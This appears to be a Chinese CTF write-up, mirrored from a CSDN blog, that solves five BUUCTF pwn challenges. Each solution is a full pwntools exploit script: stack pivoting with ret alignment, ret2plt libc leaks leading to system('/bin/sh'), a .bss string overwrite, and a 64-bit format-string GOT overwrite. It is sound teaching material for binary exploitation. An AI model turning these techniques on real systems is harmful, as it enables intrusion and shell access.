
buuctf DSACTF7月pwn 栈迁移 ret对齐 修改bss的内容 lea esp, [ecx-4] 64位格式化字符串修改got

2020年07月29日  | 移动技术网移动技术  | 我要评论

actf_2019_babystack

栈迁移,注意ret对齐
没对齐的:
在这里插入图片描述

对齐的:
在这里插入图片描述
exp:

from pwn import *
from LibcSearcher import * 

# --- target / libc selection ------------------------------------------------
local_file  = './ACTF_2019_babystack'
# The same glibc 2.27 path is used for both branches; neither is actually
# loaded below (the ELF(...) lines are commented out) — libc is resolved later
# from the leaked puts address instead.
local_libc  = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
remote_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
 
 
# 0 = run the binary locally, anything else = connect to the challenge host.
select = 0

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 26558)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

# 'debug' echoes every byte sent and received, including the leaked addresses.
context.log_level = 'debug'
context.arch = elf.arch

# Short aliases over the pwntools tube `r`.  These are Python 2 idioms: the
# '\0' padding is a str literal, so under Python 3 (where recv returns bytes)
# uu32/uu64 would raise TypeError.
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
# Right-pad a partial pointer leak with NULs to 4/8 bytes before unpacking.
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
# Log an address in hex through the tube's logger.
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
    """Attach gdb to the live target tube `r`, running `cmd` as the initial gdb script."""
    target, script = r, cmd
    gdb.attach(target, script)

# --- round 1: leak puts@libc by pivoting the stack into our own buffer -------
sleep(3)
# Ask for a 0xe0-byte message; the program then reports the buffer address
# after "at ", read here as 14 characters ("0x" + 12 hex digits).
sla('How many bytes of your message?\n', str(0xe0))
ru('at ')
stack_addr = int(rc(14),16)
info('stack', stack_addr)
# Gadgets at fixed addresses in the (non-PIE) binary, as found by the author.
pop_rdi = 0x0000000000400ad3 # pop rdi ; ret
leave_ret = 0x0000000000400a18 # leave ; ret
# Bare `ret`, used in round 2 only to re-align rsp to 16 bytes before system()
# (the "ret 对齐" point of the writeup).
ret = 0x0000000000400709#ret
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = 0x4008F6

# Chain placed at the start of the buffer.  Once rsp has been moved onto the
# buffer, the `pop rbp` of leave;ret consumes the 8 filler bytes, then
# puts(puts_got) runs and control returns to main for a second round.
p1 = 'a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
# Pad to 0xd0 so the next two qwords land on what the author determined to be
# the saved-rbp / return-address slots: rbp := buffer, rip := leave;ret, which
# moves rsp into the buffer.
p1 = p1.ljust(0xd0, '\x00') 
p1 += p64(stack_addr)+p64(leave_ret)
sea('What is the content of your message?\n', p1)
# puts prints the raw GOT entry; keep the 6 significant bytes ending in 0x7f.
puts_addr = uu64(ru('\x7f')[-6:])
info('puts_addr', puts_addr)
# LibcSearcher (third-party) identifies the libc build from the puts address;
# dump() returns symbol offsets relative to the libc base.
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
#--------------------------------------------------------------------------------------------------------
# --- round 2: same pivot, now calling system("/bin/sh") --------------------
sleep(3)
sla('How many bytes of your message?\n', str(0xe0))
ru('at ')
# The buffer address is re-read because main restarted and the stack may differ.
stack_addr2 = int(rc(14),16)
info('stack', stack_addr2)
# The extra `ret` before system_addr keeps the 16-byte stack alignment that
# the libc 2.27 system() path expects (see the writeup's aligned/unaligned shots).
p2 = 'a'*8+p64(pop_rdi)+p64(binsh_addr)+p64(ret)+p64(system_addr)+p64(main)
p2 = p2.ljust(0xd0, '\x00')
p2 += p64(stack_addr2)+p64(leave_ret)
# Unconditional gdb attach: only meaningful for the local (select == 0) branch.
debug()
sea('What is the content of your message?\n', p2)

r.interactive()

cmcc_pwnme2

修改bss上的string为./flag就可以读出flag
在这里插入图片描述
在这里插入图片描述

exp:

from pwn import *
from LibcSearcher import * 

# --- target / libc selection ------------------------------------------------
local_file  = './pwnme2'
# libc paths are declared but never loaded in this script (ELF(...) lines are
# commented out); the exploit below does not need libc at all.
local_libc  = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
 
 
# 0 = run the binary locally, anything else = connect to the challenge host.
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 29605)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

# 'debug' echoes every byte sent and received.
context.log_level = 'debug'
context.arch = elf.arch

# Short aliases over the pwntools tube `r`.  Python 2 idioms: the '\0'
# padding is a str literal, so under Python 3 uu32/uu64 would raise TypeError
# on the bytes returned by recv.
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
# Right-pad a partial pointer leak with NULs to 4/8 bytes before unpacking.
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
# Log an address in hex through the tube's logger.
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
    """Attach gdb to the live target tube `r`, running `cmd` as the initial gdb script."""
    target, script = r, cmd
    gdb.attach(target, script)

# gets is an imported function; for imports pwntools presumably resolves
# elf.sym to the PLT stub, which is what the chain returns into.
gets = elf.sym['gets']
# Address the author identified as the code that consumes the .bss string
# (see the writeup's disassembly screenshots).
exec_string = 0x80485CB
# 32-bit overflow: 0x6c bytes of buffer, 4 bytes of saved ebp, then return into
# gets() with exec_string as gets' return address and 0x804A060 (the .bss
# string the writeup mentions) as its single argument.
p = 'a'*0x6c+'b'*4+p32(gets)+p32(exec_string)+p32(0x804A060)
sla('input:\n', p)
# This line is what gets() reads into 0x804A060, replacing the .bss string.
sl('./flag')

r.interactive()

虚假的签到题

做这题的时候脑溢血,把栈地址改到ff之外去了,简直想锤自己
这题本来是秒的,但是最后有一些问题(以前也遇到过这种汇编,但是我都是在另一个函数里栈溢出的,所以也没想过这玩意)
在这里插入图片描述
用格式化字符串找到我们变量存储的位置,然后写backdoor就完事了
exp:

from pwn import *
from LibcSearcher import * 

# --- target / libc selection ------------------------------------------------
local_file  = './qiandao'
# libc paths are declared but never loaded here (ELF(...) lines commented out).
local_libc  = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
 
 
# 0 = run the binary locally, anything else = connect to the challenge host.
select = 0

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    # Host/port were left blank in the writeup; the remote branch cannot run as-is.
    r = remote('', )
    #libc = ELF(remote_libc)

elf = ELF(local_file)

# 'debug' echoes every byte sent and received.
context.log_level = 'debug'
context.arch = elf.arch

# Short aliases over the pwntools tube `r`.  Python 2 idioms: the '\0'
# padding is a str literal, so under Python 3 uu32/uu64 would raise TypeError
# on the bytes returned by recv.
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
# Right-pad a partial pointer leak with NULs to 4/8 bytes before unpacking.
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
# Log an address in hex through the tube's logger.
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
    """Attach gdb to the live target tube `r`, running `cmd` as the initial gdb script."""
    target, script = r, cmd
    gdb.attach(target, script)

# Address the writeup calls the "backdoor" function.
backdoor = 0x804857D
# Format-string leak: "%2$p" prints the 2nd argument as a pointer.  The
# author uses it to locate the input buffer; 0x24 is the distance the author
# measured from that leaked value back to the buffer (not derivable from here).
sl('%2$p')
ru('0x')
stack = int(rc(8), 16) - 0x24   # 8 hex digits = 32-bit pointer
info('stack', stack)
# Layout: backdoor address at the buffer start, 0x20 bytes of filler, then the
# value that ends up in ecx.  The function's `lea esp, [ecx-4]; ret` epilogue
# (named in the writeup title) turns that value into the new esp, so control
# lands on `backdoor`.  The exact ecx/esp relation is not shown on this page;
# confirm against the binary's epilogue before relying on the 0x24 delta.
p = p32(backdoor)+'a'*0x20+p32(stack)
#debug()
sl(p)
r.interactive()

ciscn_2019_s_9

exp:

from pwn import *
from LibcSearcher import * 

# --- target / libc selection ------------------------------------------------
local_file  = './ciscn_s_9'
# libc paths are declared but never loaded (ELF(...) lines commented out); libc
# is resolved later from the leaked puts address via LibcSearcher.
local_libc  = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
 
 
# 0 = run the binary locally, anything else = connect to the challenge host.
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 27465)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

# 'debug' echoes every byte sent and received, including the leaked address.
context.log_level = 'debug'
context.arch = elf.arch

# Short aliases over the pwntools tube `r`.  Python 2 idioms: the '\0'
# padding is a str literal, so under Python 3 uu32/uu64 would raise TypeError
# on the bytes returned by recv.
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
# Right-pad a partial pointer leak with NULs to 4/8 bytes before unpacking.
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
# Log an address in hex through the tube's logger.
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
    """Attach gdb to the live target tube `r`, running `cmd` as the initial gdb script."""
    target, script = r, cmd
    gdb.attach(target, script)

fun_got = elf.got['puts']
fun_plt = elf.plt['puts']
main = elf.sym['main']

# --- round 1: 32-bit ret2plt leak -------------------------------------------
# 0x20 bytes of buffer, 4 bytes of saved ebp, then return into puts@plt with
# main as puts' return address and puts@got as its argument: the program
# prints the resolved libc address of puts and restarts main for round two.
p1 = flat(['a'*0x20, 'b'*4, fun_plt, main, fun_got])
sl(p1)
#log.info(rl())
# The leaked pointer is little-endian; keep the 4 bytes ending in the 0xf7
# high byte.  (The commented alternative reads the 4 bytes directly.)
fun_addr = uu32(ru('\xf7')[-4:])
#fun_addr = uu32(rc(4))
info('fun_addr', fun_addr)

# LibcSearcher (third-party) identifies the libc build from the puts address;
# dump() returns symbol offsets relative to the libc base.
libc = LibcSearcher('puts', fun_addr)
libcbase = fun_addr - libc.dump('puts')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')

# --- round 2: same overflow, calling system("/bin/sh") ----------------------
# The 'b'*4 after system_addr is a dummy return address for system().
p2 = flat(['a'*0x20, 'b'*4, system_addr, 'b'*4, binsh_addr])
sl(p2)

r.interactive()

axb_2019_fmt64

64位格式化字符串改got,修改printf的got为system,然后read读入||sh,来getshell
最好system放前面,got放后面,像这样,还要调整好对齐
准备好的字符串最好打印出来看一看,方便自己对齐
low = ((system>>16)&0xff) - len("Repeater:")
high = (system&0xffff) - ((system>>16)&0xff)
是因为 C 里 %n 记录的是已经输出的字节数,所以要减掉开头的 Repeater:;而 low 那部分已经输出过一遍,后面写 high 时也会算进 high 的字节数里,所以同样要减掉。
在这里插入图片描述

from pwn import *
from LibcSearcher import * 

# --- target / libc selection ------------------------------------------------
local_file  = './axb_2019_fmt64'
# Unlike the other scripts on this page, libc IS loaded here: the exploit
# below reads libc.sym directly instead of using LibcSearcher.  Both branches
# point at the same glibc 2.23 build, so the remote service is assumed to
# match it.
local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
 
 
# 0 = run the binary locally, anything else = connect to the challenge host.
select = 0

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 26451)
    libc = ELF(remote_libc)

elf = ELF(local_file)

# 'debug' echoes every byte sent and received, including the leaked address.
context.log_level = 'debug'
context.arch = elf.arch

# Short aliases over the pwntools tube `r`.  Python 2 idioms: the '\0'
# padding is a str literal, so under Python 3 uu32/uu64 would raise TypeError
# on the bytes returned by recv.
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
# Right-pad a partial pointer leak with NULs to 4/8 bytes before unpacking.
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
# Log an address in hex through the tube's logger.
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
    """Attach gdb to the live target tube `r`, running `cmd` as the initial gdb script."""
    target, script = r, cmd
    gdb.attach(target, script)
# "%83$p" prints the 83rd format argument, which the author identified as the
# saved return address into __libc_start_main.  240 is the offset of that
# return site inside __libc_start_main for this glibc 2.23 build (author's
# value; re-check it for any other libc), so subtracting both gives the base.
sl('%83$p')
ru('0x')
libc_base = int(rc(12), 16) - libc.sym['__libc_start_main'] - 240   # 12 hex digits = 48-bit pointer
info('libc_base', libc_base)
system = libc_base + libc.sym['system']
info('system', system)
# Python 2 generator API (.next()); `binsh` is computed but never used below.
binsh = libc_base + libc.search('/bin/sh').next()
# Target of the overwrite.  This only works because the GOT is writable
# (partial RELRO); with full RELRO this entry would be read-only.
printf = elf.got['printf']
# %n-style conversions store the number of bytes printed so far.  The program
# echoes input behind "Repeater:" (9 bytes), so that prefix is subtracted from
# the first width, and the first width is subtracted from the second because
# the count keeps accumulating (see the explanation above the script).  Both
# differences are assumed non-negative; nothing here checks that.
low = ((system>>16)&0xff) - len("Repeater:")
high = (system&0xffff) - ((system>>16)&0xff)
info('low', low)
info('high', high)
# Argument 12 -> %hhn writes byte 2 of `system` to printf@got+2; argument 13
# -> %hn writes the low 16 bits to printf@got.  The format is padded to 32
# bytes so that the two pointers appended next sit at those argument slots
# (slot numbers determined by the author from the stack layout).
p = '%'+str(low)+'c%12$hhn'+'%'+str(high)+'c%13$hn'
p = p.ljust(32, 'a')
p += p64(printf+2)+p64(printf)
# Python 2 print statement; the writeup suggests eyeballing the format to
# check the padding/alignment before sending.
print p
sl(p)
# After the overwrite the program's next printf call goes to system() with
# the echoed input as its argument, which is why the second line is "||sh".
sl('||sh')
r.interactive()

本文地址:https://blog.csdn.net/carol2358/article/details/107554781


